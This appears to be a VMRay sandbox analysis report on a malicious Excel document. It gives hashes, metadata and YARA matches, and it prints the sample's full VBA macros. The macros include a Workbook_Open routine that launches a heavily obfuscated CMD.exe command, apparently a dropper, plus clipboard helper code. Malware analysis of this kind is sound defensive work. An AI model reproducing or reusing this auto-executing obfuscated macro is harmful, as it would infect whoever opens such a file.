81e10dc5...b804 | Files
Try VMRay Analyzer
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: -

81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804 (SHA256)

2018110654968.xls.t.xls

Excel Document

Created at 2018-11-06 08:00:00

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\2018110654968.xls.t.xls Sample File Excel Document
Suspicious
»
Mime Type application/vnd.ms-excel
File Size 115.50 KB
MD5 0edba7614266430b14768292a3c9ce02 Copy to Clipboard
SHA1 ae4259faf61ff2f9e2506da4fdaba2ebe57fe6a9 Copy to Clipboard
SHA256 81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804 Copy to Clipboard
SSDeep 3072:DbQ+A64l7VX1TnRrpXJ0eQm02RxHFk3hOdsylKlgryzc4bNhZFGzE+cL2knm4Yz/:DbQ+A64l7VX1TnRrpXJ0eQm02RxHFk3E Copy to Clipboard
Office Information
»
Create Time 2018-10-21 23:24:59+00:00
Modify Time 2018-11-06 07:45:27+00:00
Document Information
»
Codepage Cryllic
Application Microsoft Excel
App Version 14.0
Document Security SecurityFlag.NONE
Heading Pairs Worksheets, Named Ranges
Titles Of Parts 2018.11, '2018.11'!Print_Area
scale_crop False
shared_doc False
VBA Macros (2)
»
Macro #1: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Forms2F()
mmm (marrsell)
dabsa = "T ^ ^?^$^_=^!^`^}^$^@:^p^BM^=^Q^!)  , )   ,   ,  )&  (   ,,,(  ,  ,,   (^s^ET ^ ^ ;^.^+=^!^?^$^_^:^(^=^7^!) ; ; ; ) , )&&   (^S^e^t ^ ^ ^-^}=^!^;^.^+^:^a^K^=^=^!)&  ( ,   , (^S^et ^ ^.^;^?=^!^-^}^:^h^e^i^=^j^!) ; ; ; )&& (   ;  ; ;  ( ; ; (S^e^T ^ ^ ^+^.^@^#=!^.^;^?^:^3^k^9^=^b^!)   ,, ,  ) ,;   , ;  , ;   ,)&&   ( ; ; ( (^S^Et ^{^'^`^#=^!^+^.^@^#^:^4^=^w^!) , ) , )&   ( , , (^s^E^t ^}^$^]^?=^!^{^'^`^#^:^H^=^4^!)   ,,  ,)&  (^s^e^T ^{^,^.=^!^}^$^]^?^:^a^E^=^G^!)&&(^s^E^T ^ ^ ^ ^}^{=^!^{^,^.^:^1^=^(!)&( ( , (^S^e^T ^.^@^_#=!^}^{^:^T^F^=^h^!) ) ; )&   ( (^S^E^t ^ ^ ^]^$^*^{=!^.^@^_^#^:^j^V^=^H^!)  ; ;   ; )&(^s^eT ^ ^#^-=^!^]^$^*^{^:Dn^=^1^!)&&   ( , ,   (   , ,   (S^e^T ^.^$^+=^!^#^-^:^t^y^=^P^!) , ) )&&( ; ;   ( ,   , (^s^e^t ^ ^+^,^\=^!^.^$^+^:^q^vN^=N^!),   ,   , ),  ,,,  , )&   (,; ,   ;,(^S^e^t ^ ^  ^]^#=^!^+^,^\^:^[^=^;^!)   ,   )&  ( , , ( ; ; (^Se^T ^_^`^@^#=^!^]^#^:^{^=^[^!)   ; ;   ) ,  )&(^S^e^t ^ ^ ^[^_=!^"
Call Shell(marrsell + sdemom & dabsa + "_^`^@^#^:^\^=^{^!)&& (^s^e^t ^ ^ ^$^_^'^}=^!^[^_^:^3^=^U^!)& (^S^e^t ^\^[,^#=^!^$^_^'^}^:^@=^$!)&&   (   ;  ( , (^s^e^t ^,^`=^!^\^[^,^#^:^#^=^3^!),  ) ,   ;  ,   ; ,  )& (  , , (^S^e^t ^*^[^-^,=^!^,^`^:^`^=^y!) ; ; ; )&& , ^F^oR  ; ; ; /^f ,""delims=ULfr  tokens=   +1   ""  ; , %^g; ; ,  ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; ,  ^|,  ,  ^^f^^iN^^d^^S^^t^^r ;^^c^^m  '; ,)  , ;  ^d^o, ,   ;;  ;  (^e^c^h^O  ,%^*^[^-^,%   |%^g; ); ,  """, 99 - 99)
End Sub
Sub Workbook_Open()
  Forms2F
End Sub
Function marrsell()
marrsell = AndPlus
End Function
Sub njk()
sStr = "{12}{16}{15}{21}{14}{9}{20}{10}{7}{19}{22}{1}{6}{3}{2}{17}{4}{23}{13}{0}{24}{25}{11}{8}{5}{18};.(UCA{1}{"
sStr = sSrt + "0}([cHAR]85+[cHAR]67+[cHAR]65),[cHAR]34)) "
mmm (sStr)
End Sub
Function settler()
settler = "CMD.Exe                  /c ^F^o^r ; /^f ;; ""   tokens=  +2 delims=FeH""  , %^1,;  iN  ,  (  ,  ',  , ^^f^^t^^Yp^^e  ;^|;^^f^^IN^^d ,  ;,  ""SHCm"" , , ;  ' ; ,  )  , ,  ,^d^O ,%^1,  ;  ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ ,  cw8f/^r "",  (   , ;  ,   ;  ,( ,  ;   , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^"
End Function
Function doublecheck()
doublecheck = "QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h"
End Function
Function formsands()
formsands = "^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j"
End Function
Function cleardatas()
cleardatas = "^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^"
End Function
Function commde()
commde = "fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&(  ; (  ;  ; ;   (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!)   ; ; ;  ) )&&   ( ,  (,  (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ;  )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) ,   ) ,   )&( ,   , ,   (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) ,  )&& (   (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!),  )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!),   ,  ,  )&   ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&&  (   ,  ;  ,  ( , ; , ;   ,   (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!)  ,   ) , , )&&  (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&&   ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&&  ( , ; ,   ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!)   ,   ;  ,  ;  ,  )&  (   ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!)   ,  )   ,  ;, )&   ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!)"
End Function
Function crsss()
crsss = " ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ;  , )& ( ( ,  , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )&  (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( ,   ( ,   (^s^e^t  ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) )   , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^!^_^@^.^-^:^u^=^B!)&& (,   ; , (^S^e^T ^.^,^`^_=^!^$^'^:^v^=^u!) )&&   (^s^e^t ^ ^'^,`^+=^!^.^,^`^_^:^a^x^d^=,^!)&&( , ( , (^S^Et ^ ^ ^ ^,^_^}^~=^!^'^,^`^+^:^7^y=^V^!) , ) ; ; )&&   ( ; ; ; ( (s^E^T ^'^{=^!^,^_^}^~^:k^V^=^p^!) , ) ; )&  ( ,  ( ;   ;   (^s^e^T ^-^}^#=^!^'^{:^T^d^=^L^!)   ,  ,  ,)   ,, ,)&   ( , , ( , (^S^e^T ^ ^$^+=^!^-^}^#^:^T^g^=^Y^!) , , ) ;   ; )&&  (  ,  , (S^e^t ^ ^ ^_^'^*^{=^!^$^+^:^Q^I=^k^!) ; )&  (^s^E^T ^ ^ ;^`^}^~=^!^_^'^*^{^:G^C^V^=^t!)&(  , , ,(^S^e^T ^ ^+^?^.^,=^!^;^`^}^~^:^F^l^=^f^!) )&(^s^E^T ^ ^'^]"
End Function
Function AndPlus()
AndPlus = settler + doublecheck + formsands + cleardatas + commde + crsss
End Function
Private Function sdemom()
sdemom = "=!^+^?^.^,^:^3^7^=^d^!)&& (^s^E^T ^ ^[^$^#^?=^!^'^]^:%^=^T!)&& (,   ;  ,  ;,  (  , ;  ,   (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^:^V^D^a=^C^!) , , ) )& ( , , (^S^E^T  ^ ^ ^*^.^@=^!^}^\^:o=%^!)  ,   )&&  ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^:X^=^o^!) , )&   ( ,; ,   ;   ,; ,  (^s^E^t  ^ ^ ^`^.^_=^!^*^}^:^o^b^=^X^!) )&& (  ;  ; ( , , (^s^et ^ ^ ^\^#=^!^`^.^_^:^L^Q^=^J^!)  ; ;  ;   )   ;   )&& ( , , (^sE^t ^ ^~^\=^!^\^#^:^P^j^=^O^!) , )&   ( ; ; ; (^S^Et ^\^,=^!^~^\^:^z^E^h^=^F^!) , )&(  ,   ,,  , ,  (  ,   ,,   (^s^et ^`^[^+=!^\^,^:Z^=^i^!)   ,   )  , )&   (  (   (^S^E^t ^ ^ .^*^#=^!^`^[^+^:/^=^z!) ; ) , )& ( ; ;   ;   (s^e^T ^ ^ ^ ^@^;^?^#=^!^.^*^#^:^c^g^=^/^!) )&( ( , , (^S^e^t ^ ^ ^ ^,^@^$^[=^!^@^;^?^#^:^j^h^=^S^!) ) ; )& (^S^e^T ^ ^ ^{^$^_=^!^,^@^$^[^:^B^k=^M^!)&(^S^e^t ^ ^  ^'^`^#=^!^{^$^_:f^6^=^v^!)&( ( (^S^e^T ^ ^ ^ ^}^\^?=^!^'^`^#^:]^=^r^!)  , ,  )  , ,   )&& (  ,   ,   ,   (^s^e^t ^ ^ ^ ^{^;=^!^}^\^?^:7^=^x^!) ; ; ; )&  (^s^E^t ^ ^`^}^$^@=^!^{^;:^O^y^=^]^!)&& ( , , ( , (^S^E"
End Function

Macro #2: Module1
»
Attribute VB_Name = "Module1"
Option Explicit
Private Declare PtrSafe Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalFree Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalLock Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalSize Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalUnlock Lib "kernel32" (ByVal hMem As LongPtr) As Long
Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As LongPtr) As Long
Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
Private Declare PtrSafe Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As LongPtr
Private Declare PtrSafe Function lstrcpy Lib "kernel32" (ByVal lpString1 As Any, ByVal lpString2 As Any) As LongPtr

Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_ZEROINIT = &H40
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)

Public Const CF_TEXT = 1
Public Const MAXSIZE = 4096

Sub mmm(MyString As String)
    Dim hGlobalMemory As LongPtr, lpGlobalMemory As LongPtr
    Dim hClipMemory As LongPtr, X As Long


    hGlobalMemory = GlobalAlloc(GHND, Len(MyString) + 1)


    lpGlobalMemory = GlobalLock(hGlobalMemory)


    lpGlobalMemory = lstrcpy(lpGlobalMemory, MyString)


    If GlobalUnlock(hGlobalMemory) <> 0 Then

       GoTo OutOfHere
    End If


    If OpenClipboard(0&) = 0 Then

       Exit Sub
    End If


    X = EmptyClipboard()


    hClipMemory = SetClipboardData(CF_TEXT, hGlobalMemory)

OutOfHere:
    If CloseClipboard() = 0 Then
       MsgBox "*"
    End If
End Sub


YARA Matches
»
Rule Name Rule Description Classification Severity Actions
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image